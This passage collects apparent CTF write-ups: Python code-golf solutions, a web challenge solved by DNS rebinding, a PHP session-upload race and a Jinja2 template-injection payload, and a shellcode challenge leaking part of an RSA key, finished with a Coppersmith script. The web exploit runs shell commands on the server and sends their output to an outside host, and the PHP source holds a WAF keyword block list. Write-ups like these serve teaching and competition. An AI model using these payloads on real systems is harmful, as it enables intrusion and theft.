Nevertheless, this first solution contains a couple of ideas. The first and most important one was to use the for x in y syntax as an assignment operator by transforming x := y into for x in [y]. Creating a one element long list from y results in x taking the value y during execution. While it is not possible to overwrite this assignment I could now use x multiple times. This was required as I was not able to read in n,m multiple times. This solution can also be broken down into multiple parts.

for n,m in[tuple(map(int,input().split()))]for d in[[list(map(int,x().split()))for x in[input]*n]]

The first part reads the input and provides the number of elements n and the amount of money m as well as a list of two element lists d containing all junk food items.

for x in[sum([d for j,d in enumerate(d)if i>>j&1],[])for I in range(2**n)]

The second part calculated all possible combinations of items by iterating overall numbers until 2**n. Taking that number in binary representation the individual bits are treated as flags that decide which junk food is put into the bag. They are not summed up as one may think. Instead their two element list representations are concatenated. The values now are at each odd index while the costs are stored in the even indexes. Note that at this stage combinations that cost more than m are generated as well. This whole creation is now wrapped into the front part that extracts the cost and a clause at the end of the comprehension that checks whether the cost exceeds the budged. Finally, the maximum is taken and then printed.

[print(max([sum(x[::2])for insert_here in["part one","part two"]if sum(x[1::2])<=m]))]

A second attempt

After thinking hard for a while I finally managed to shrink the solution below the 200 character mark to 197:

[print(max(int(x.real)for n,m in[map(int,input().split())]for d in[[complex(*map(int,x().split()))for x in[input]*n]]for x in[sum(d[j]for j in range(n)if i>>j&1)for I in range(2**n)]if x.imag<=m))]

A nifty trick was to use the complex number type. This way I could directly sum the elements in part two and access the value via the real and the cost via the imaginary part of the complex number. While I finally met the size constraints this solution was still not accepted. After sending it to the server I was greeted by Runtime Error QQ. I quickly realized that my O(2**n) implementation exceeds the allowed resource limit and had to rethink the entire approach.

A proper solution

I briefly searched for other people already having golfed knapsack in python to maybe shortcut the challenge. The only post in the code golf stack exchange I found was not directly applicable and would have to be rewritten into a list comprehension with only 15 characters to spare. I decided to give the pseudo code implementation from Wikipedia a shot.

// Input:
// Values (stored in array v)
// Weights (stored in array w)
// Number of distinct items (n)
// Knapsack capacity (W)
// NOTE: The array "v" and array "w" are assumed to store all relevant values starting at index 1.

for j from 0 to W do:
    m[0, j] := 0

for I from 1 to n do:
    for j from 0 to W do:
        if w[i] > j then:
            m[i, j] := m[i-1, j]
        else:
            m[i, j] := max(m[i-1, j], m[i-1, j-w[i]] + v[i])

The most important realization I had was that the individual rounds for i only directly access the previous one and that m[i,j] is always at least as great as m[i-1,j]. Therefore, I can implement the first loop as a recursion. I just needed to create a lambda function and pass that function itself as some argument. Instead of using two arrays I also only use one with value and cost being interleaved. Finally, I also reduced the size of the reading part by applying a cool trick I found in a code golf python tips answer on stack overflow.

[f(f,[0]*m,0)for n,m,*d in [map(int,open(0).read().split())]for f in[lambda f,a,i:f(f,[a[j]if d[2*i+1]>j else max(a[j],a[j-d[2*i+1]]+d[2*i])for j in range(m)],i+1)if i<n else print(max(a))]]

I finally ended up with a 197 character long solution that also got accepted by the checker.

Tree depth

Surprisingly the last problem did not give me nearly as much trouble as the previous one.

Question: Depth of the tree. There is a size N tree with node index from 0 to N-1. The first line is an integer N (tree size). Then, there would be N numbers in the next line each represents the father of the node. (0 is always the root). 10 <= N <=10000. Please notice that for any i, father[i] < i.
Example Input:
3
0 0 1

Example Output:
2
Input Length Limit: 300

Achtung: Teile der Antwort könnten die Bevölkerung verunsichern - Caution: Parts of this answer can be considered disturbing. Readers discretion is advised

I had a short enough solution for this part even before I finished the previous problem.

[print(max(*[f(f,d,[],0)for n in[int(input())]for d in[[*map(int,input().split())]]for f in[lambda f,d,a,c:a if c>=n else f(f,d,a+([a[d[c]-1]+1]if d[c] else[1]),c+1)]]))]

The first line is read into n and the numbers on the second line into d. Then a recursive function f is defined. This function takes itself as first argument, all inputs as second, an accumulator storing the tree depth as third and finally a variable holding the recursion depth. The recursive function f now looks up the parent of the current input node and appends that depth plus one to the accumulator before passing it to the nested function call. While this works cleanly in theory, in praxis the checker answers with: Runtime Error QQ. Clearly I must have exceeded some limit… But which could it be? Running this list comprehension with a tree of the maximum specified size quickly yields the answer: RecursionError: maximum recursion depth exceeded in comparison

Thus I abandon all reason and followed a particularly twisted and evil thought: What if I just modify a variable during the list comprehension?

The creators of the list comprehension were clever. They thought of this. > They forbid the assignment operator for no men to treason from the pure and functional land into the realm of madness. A place of chaos where functions may output results based on their mood or delete the system when supplied the argument 6 the third time in a row. But their attempts were futile for I had created an abomination. A monster originally formed by intentions pure and functional, yet there was poison at its very heart. I utilized forgotten knowledge and forbidden sorcery to unearth the functional programmers most despised concept: functions that modify state.

To be precise I talk about the innocent looking function append.

There was a second restriction that had to be circumvented. Namely lambda functions not being allowed to contain multiple statements. But I wanted to update the state and return a result, yet append only does the first. From my earlier excursion to the stack overflow code golf tips I remembered one particular answer. Specifically the first comment of that answer: both list elements are evaluated. To have multiple statements in a lambda I just have to write them as a list and then access the element I want to return. Together with the append function I used to update the state of the variable a during the list comprehension i came up with the following solution that only needed 147 out of the 300 allowed bytes:

[print(max([[f(e),a[i]][1]for n,h,*d in[map(int,open(0).read().split())]for a in[[0]]for f in[lambda e:a.append(a[e]+1)]for i,e in enumerate(d)]))]

But this was not good enough for me. I saw lots of potential thus I rewrote the function and created my final answer to this challenge:

[print(max([a.append(a[e]+1),a[e]+1][1]for a in[[0]]for e in map(int,open(0).read().split()[2:])))]

I realized that the lambda is not necessary any more, the enumerate is useless, and I can directly iterate over the input elements if I seed the accumulator with 0 and skip the first two numbers. Lastly, I removed the inner list comprehension as max also works with a generator. With these changes i finally solved the third challenge with 99 out of 300 allowed characters.


卍乂Oo韓國魚oO乂卍 writeup

0xbb | web, 527 points

This web challenge (all source code given :)) consists of a PHP frontend and a Python + Flask backend.

Analysis

index.php:

...
<?php

ini_set('default_socket_timeout', 1);

$waf = array("@","#","!","$","%","<", "*", "'", "&", "..", "localhost", "file", "gopher", "flag", "information_schema", "select", "from", "sleep", "user", "where", "union", ".php", "system", "access.log", "passwd", "cmdline", "exe", "fd", "meta-data");

$dst = @$_GET['🇰🇷🐟'];
if(!isset($dst)) exit("Forbidden");

$res = @parse_url($dst);
$ip = @dns_get_record($res['host'], DNS_A)[0]['ip'];

if($res['scheme'] !== 'http' && $res['scheme'] !== 'https') die("Error");
if(stripos($res['path'], "korea") === FALSE) die("Error");

for($i = 0; $i < count($waf); $i++) 
    if(stripos($dst, $waf[$i]) !== FALSE)
        die("<svg/onload=\"alert('發大財!')\">".$waf[$i]);
sleep(1);

// u can only touch this useless ip :p
$dev_ip = "54.87.54.87";
if($ip === $dev_ip) {
    $content = file_get_contents($dst);
    echo $content;
}

The script is used to request URLs, but it is based on state-of-the art WAF technology to filter out malicious URLs and only allows queries to a certain (useless) IP. But it’s visible that the DNS check (always uses the first A record) is separated from the IP used in the finaly access. Additionally, the script contains a sleep(1) which should allow us to return a different DNS record for the second request. We also need to take care of the path checking, because we are only allowed to access URLs containg korea in this part.

So we proceed with the analysis of the backend.

main.py:

...
def sanitize(str):
    return str.replace(".", "").replace("{{", "")
...
@app.route('/error_page')
def error():
    error_status = request.args.get("err")
    err_temp_path = os.path.join('/var/www/flask/', 'error', error_status)
    with open(err_temp_path, "r") as f:
        content = f.read().strip()
    return render_template_string(sanitize(content))
...

The script provides access to essential memes and contains two functions useful for exploiting the task. It can be seen that that the /error_page route directly opens a file specified by the err GET parameter and renders it’s content with Jinja2. Jinja2 injection is a common topic within web challenges and together with the sanitize it seemed to be the right way to solve the task. Additionally, it should be noted that the script is also run as the www-data user.

Summary

We can summarize our exploit plan:

  • DNS “trickery” to bypass the IP check
  • Redirect to 127.0.0.1:5000/error_page to bypass the path check
  • PHP_SESSION_UPLOAD_PROGRESS trick to upload a Jinja2 template
  • Some Jinja2 trickery to trick the sanitize function
  • Profit

Exploit

We use our domain to set up a subdomain for an external DNS server:

t1ns 300 IN A  159.69.36.2
t1   300 IN NS t1ns.hxp.io.

The external DNS server then uses the following config:

'x.t1.hxp.io': [
    Record(A, '54.87.54.87', ttl=0), # useless IP
    Record(A, '159.69.36.2', ttl=0), # hxp.io IPv4
    Record(AAAA, '2a01:4f8:1c1c:44b3::1', ttl=300), # hxp.io IPv6
]

It will always return the “useless” IP A record an attack IP together with a low ttl. This gives us the change to bypass the IP check, because of random ordering of DNS records. If the first DNS request gets the “useless” and the second request the attack IP the frontend will be accessing our server. Just in case, we also add our AAAA record if file_get_contents uses IPv6. You can find the full DNS server in the Appendix.

We create a helper PHP script to redirect the frontend to the the vulnerable /error_page in the backend. Additionally, this script will catch the extracted flag.

<?php
// run with php -S '[::]:5000' in ./koera/index.php
if($_SERVER['REQUEST_METHOD'] === 'POST') {
        error_log(file_get_contents('php://input'));
        exit();
}
header("Location: http://127.0.0.1:5000/error_page?err=../../../../var/lib/php/sessions/sess_please-play-hxp-36c3-CTF");

Finally, we craft an exploit script to execute the plan: We first race to create a session file with the crafted Jinja2 payload. Next, we try to bypass the IP check and render the hopefully uploaded payload.

#!/usr/bin/env python3
import requests, threading, base64

url = 'http://koreanfish4.balsnctf.com/'

# adapted  (removed {{ and .) from https://github.com/epinna/tplmap/issues/46#issuecomment-401219988
eval_payload = base64.b64encode(b"""__import__("urllib.request").request.urlopen("http://hxp.io:5000/korea/",data=__import__("os").popen("/readflag;id").read().encode())""").decode()
payload = """{%set d="eval(getattr(__import__('base64'),'b64decode')('""" +eval_payload+ """'))"%}{%for c in []['__class__']['__base__']['__subclasses__']()%} {%if c['__name__'] == 'catch_warnings'%}{%for b in c['__init__']['__globals__']['values']()%}{%if b['__class__']=={}['__class__']%}{%if 'eval' in b['keys']() and b['eval'](d)%}{%endif%}{%endif%}{%endfor%}{%endif%}{%endfor%}"""

def pwn_worker():
    """ injects payload into session """
    files = {'file': b'A'*1_999_000}
    while True:
        r  = requests.post(url, data={
            'PHP_SESSION_UPLOAD_PROGRESS': payload
        },
        files=files, cookies={
            'PHPSESSID': 'please-play-hxp-36c3-CTF',
        },params={
            "🇰🇷🐟":'http://x.t1.hxp.io/koreafish?id=1'
        })
        print('p', end='', flush=True)

def exec_worker():
    """ try to execute the exploit """
    while True:
        r = requests.get(url,params={
            "🇰🇷🐟":'http://x.t1.hxp.io:5000/korea/' # redirects to: http://127.0.0.1:5000/error_page?err=../../../../var/lib/php/sessions/sess_please-play-hxp-36c3-CTF
        })
        print('x', end='', flush=True)

        if 'upload_progress_' in r.text:
            print('!!! FLAG should be in the log !!!')

for _ in range(6):
    threading.Thread(target=pwn_worker).start()

for _ in range(2):
    threading.Thread(target=exec_worker).start()

Flag: Balsn{Korea_fish_is_good_to_eat!!!}

Appendix

Minimal Python3 DNS server:

#!/usr/bin/env python3
# from https://gist.github.com/xero/65fc61e0bd8a4d4f267861cc3785e95b

from datetime import datetime
from time import sleep

from dnslib import DNSLabel, QTYPE, RD, RR
from dnslib import A, AAAA, CNAME, MX, NS, SOA, TXT
from dnslib.server import DNSServer

EPOCH = datetime(1970, 1, 1)
SERIAL = int((datetime.utcnow() - EPOCH).total_seconds())

TYPE_LOOKUP = {
    A: QTYPE.A,
    AAAA: QTYPE.AAAA,
    CNAME: QTYPE.CNAME,
    MX: QTYPE.MX,
    NS: QTYPE.NS,
    SOA: QTYPE.SOA,
    TXT: QTYPE.TXT,
}

class Record:
    def __init__(self, rdata_type, *args, rtype=None, rname=None, ttl=None, **kwargs):
        if isinstance(rdata_type, RD):
            # actually an instance, not a type
            self._rtype = TYPE_LOOKUP[rdata_type.__class__]
            rdata = rdata_type
        else:
            self._rtype = TYPE_LOOKUP[rdata_type]
            if rdata_type == SOA and len(args) == 2:
                # add sensible times to SOA
                args += ((
                    SERIAL,  # serial number
                    60 * 60 * 1,  # refresh
                    60 * 60 * 3,  # retry
                    60 * 60 * 24,  # expire
                    60 * 60 * 1,  # minimum
                ),)
            rdata = rdata_type(*args)

        if rtype:
            self._rtype = rtype
        self._rname = rname
        self.kwargs = dict(
            rdata=rdata,
            ttl=self.sensible_ttl() if ttl is None else ttl,
            **kwargs,
        )

    def try_rr(self, q):
        if q.qtype == QTYPE.ANY or q.qtype == self._rtype:
            return self.as_rr(q.qname)

    def as_rr(self, alt_rname):
        return RR(rname=self._rname or alt_rname, rtype=self._rtype, **self.kwargs)

    def sensible_ttl(self):
        if self._rtype in (QTYPE.NS, QTYPE.SOA):
            return 60 * 60 * 24
        else:
            return 300

    @property
    def is_soa(self):
        return self._rtype == QTYPE.SOA

    def __str__(self):
        return '{} {}'.format(QTYPE[self._rtype], self.kwargs)
ZONES = {
    'x.t1.hxp.io': [
        Record(A, '54.87.54.87',ttl=0),
        Record(A, '159.69.36.2', ttl=0), # hxp.io IPv4
        Record(AAAA, '2a01:4f8:1c1c:44b3::1', ttl=300), # hxp.io IPv6
    ]
}

class Resolver:
    def __init__(self):
        self.zones = {DNSLabel(k): v for k, v in ZONES.items()}

    def resolve(self, request, handler):
        reply = request.reply()
        zone = self.zones.get(request.q.qname)
        if zone is not None:
            for zone_records in zone:
                rr = zone_records.try_rr(request.q)
                rr and reply.add_answer(rr)
        else:
            # no direct zone so look for an SOA record for a higher level zone
            for zone_label, zone_records in self.zones.items():
                if request.q.qname.matchSuffix(zone_label):
                    try:
                        soa_record = next(r for r in zone_records if r.is_soa)
                    except StopIteration:
                        continue
                    else:
                        reply.add_answer(soa_record.as_rr(zone_label))
                        break

        return reply

resolver = Resolver()
servers = [
    DNSServer(resolver, port=53, address='0.0.0.0', tcp=True),
    DNSServer(resolver, port=53, address='0.0.0.0', tcp=False),
]

if __name__ == '__main__':
    for s in servers:
        s.start_thread()

    try:
        while 1:
            sleep(0.1)
    except KeyboardInterrupt:
        pass
    finally:
        for s in servers:
            s.stop()

shellcode writer

yyyyyyy | crypto, 906 points

As usual for a shellcoding challenge, we are given a binary that runs our (x86_64) shellcode in some sandbox, and the goal here is to extract some information: Specifically, we are given an RSA public key and ciphertext, and the binary that runs our shellcode first decrypts it using the corresponding private key — the (apparent) goal is to extract the private key, since we’re also given an encrypted flag file.

Obviously, the first idea is to find leftover pieces of the private key in memory and simply write() them out to decrypt the flag. However, it’s not all that easy:

  • The shellcode must be at most 25 bytes long.
  • We are allowed only write() and exit(), so we can’t just get a shell or something.
  • The given binary does not free the private key after using it, but it does write stuff on the heap prior to running our shellcode. We suspected this was to overwrite the key material, which is indeed partially (ha, ha) true.

We discovered that the fourth word on the stack when our shellcode runs is a pointer to the heap, so we tried (variants of) the following shellcode:

_start:
pop rbx
pop rbx
pop rbx
pop rbx           // points somewhere on heap
sub bh, 0x1c      // move back a bit
0:
    xor eax, eax
    inc eax
    mov edi, eax
    push rbx
    pop rsi
    cdq
    inc dh
    add rbx, rdx  // rbx_new = rbx_old + 0x100
    syscall       // write(1, rbx_old, 0x100)
    jmp 0b

When running the binary locally on some machine with our own key and dumping some data from memory, we simply discovered one of the prime factors in the leakage, which inspired hope. However, this did not work on the target server and key, so it really depended on implementation specifics like the heap layout. Thus, we used the given Dockerfile to reproduce the setup of the target machine, and after searching for various parts of the private key used for testing in the leakage, we found that a big chunk (but not all) of the RSA d value was contained in the leak. Firing the same shellcode against the target server produced similar-looking leakage (random-looking data at the same offset), so we decided that those bytes were probably the same part of the target d value and started looking at the math problem of recovering the full d value.

It wasn’t hard to see using our own copy of the setup that the leaked data consisted of the lower 54 bytes of d in little endian. This is a standard problem, discussed e.g. in Dan Boneh’s excellent survey on RSA attacks, Section 4.5. The n value of the key in question was 1024 bits, so the leakage in fact gave us about 42% of d.

We wrote a sage script to solve for the rest, first recovering guesses for the lower 548 bits of p and then using Coppersmith’s algorithm for univariate polynomials to find the rest:

#!/usr/bin/env sage
from Crypto.PublicKey import RSA

pub = RSA.importKey(open('home/pub.pem','rb').read())

n,e = pub.n, pub.e
d0 = int('-\xd3\xc0m\xb0\xa9q\x94\x19z\xe7 \xc2\x17\x86S|\xf1(\xfe\xba`\x9b\xd0.\xad<\xc0]\x9f\x866\x90\xbf\xa7\xb5m\xad\xa9\x13\xdd]c\xa5\xd2c\x91\xd3!x\xcerfQ'[::-1].encode('hex'),16)

nbits = floor(log(n,2)+1)

l = 54*8
l -= 7

R.<Y> = Zp(2, l+999)[]
p0s = set()
for k in range(1,e+1):
    f = e*d0*Y - Y - k*(n*Y - Y**2 - n + Y)
    zs = f.roots(multiplicities = False)
    p0s |= {ZZ(z) % 2**l for z in zs}


R.<X> = Zmod(n)[]
ps = set()
for p0 in p0s:
    f = 2**l*X + p0
    f /= f.lc()
    zs = f.small_roots(beta=.4, X=2**(nbits//2-l+7), delta=.999)
    for z in zs:
        p = 2**l*z + p0
        ps.add(p)

p,q = ps

d = ZZ(Mod(e, (p-1)*(q-1))**-1)
cipher = int(open('home/flag.enc').read().encode('hex'),16)
plain = ZZ(pow(cipher, d, n))
flag = '{:0256x}'.format(plain).decode('hex').lstrip('\0')
print('--> \x1b[32m{}\x1b[0m'.format(flag))

Running this script takes a few seconds and then simply prints the flag:

--> Balsn{3a11_0ff1cia1_ap1_tO__fr3e__a3teR_d3crYpt1on...}